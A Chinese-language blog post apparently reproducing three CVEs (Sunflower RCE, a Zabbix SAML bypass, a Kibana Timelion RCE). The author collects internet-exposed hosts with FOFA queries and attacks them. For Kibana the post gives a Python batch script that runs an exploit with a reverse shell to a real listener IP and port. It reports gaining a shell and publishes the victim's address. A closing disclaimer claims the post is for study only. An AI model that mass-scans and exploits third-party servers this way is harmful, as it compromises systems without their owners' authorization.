案例:CNVD-2022-10207:向日葵RCE

影响客户端版本:

  • 11.1.1

  • 10.3.0.27372

  • 11.0.0.33162

在Windows 10中安装向日葵程序,并关闭系统防火墙

开启向日葵发现漏洞版本都已经淘汰了,已经无法利用,搜索解决方法让更新版本

利用工具探测也一无所获


fofa获取资产批量扫描也一个漏洞都没有

案例演示:设备平台-Zabbix-CVE-2022-23131

影响版本

Zabbix Web 前端版本包括

  1. •5.4.8

  2. •5.0.18

  3. •4.0.36

  4. •6.0.0alpha1

漏洞复现

Fofa 语法

app="ZABBIX-监控系统" && body="saml"

根据语法获取到大量资产

经过5--6个目标的复现,发现漏洞已经无法利用,官方增加了新的验证

根据漏洞复现文章得出:绕过以下登录验证即可进入zabbix后台

但是绕过此登录验证后并没有进入后台,而是跳转到了另一个账户验证。尝试复现多个目标都是如此


官方应该增加了一个账户验证,只有在租户中的账户才能登录zabbix

浏览器搜索该漏洞,发现复现文章也截至在了2022年,2023年无此漏洞复现文章

案例演示:设备平台-Kibana-CVE-2019-7609

漏洞产生

攻击者利用漏洞可以通过Kibana后台中的Timelion组件中的JavaScript原型链污染攻击,向Kibana发起相关请求,从而接管所在服务器,在服务器上执行任意命令。

影响范围

Kibana < 6.6.1

Kibana < 5.6.15

fofa获取大量资产,使用脚本测试漏洞,但是脚本只能一次测试单个ip

所以利用python编写一个批量脚本:

将大量ip保存到一个ips.txt文件

pyrhon脚本内容:漏洞测试脚本每执行结束一条命令,就将命令中的ip替换接着执行

脚本:

import os

for ip in open("ips.txt"):

ip=ip.strip()

#print(ip)

cmdline='python CVE-2019-7609-kibana-rce.py -u %s -host 43.134.241.193 -port 5566 --shell'%ip

print(cmdline)

os.system(cmdline)

python运行脚本,成功实现批量检测


然而这个漏洞貌似也过时了,扫描几个小时也没有出现一个

出现几个也都是误报,无法反弹shell


经过一晚上检测之后终于成功反弹shell


漏洞地址:http://1.116.90.210:5601

免责声明

本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本平台和发布者不为此承担任何责任。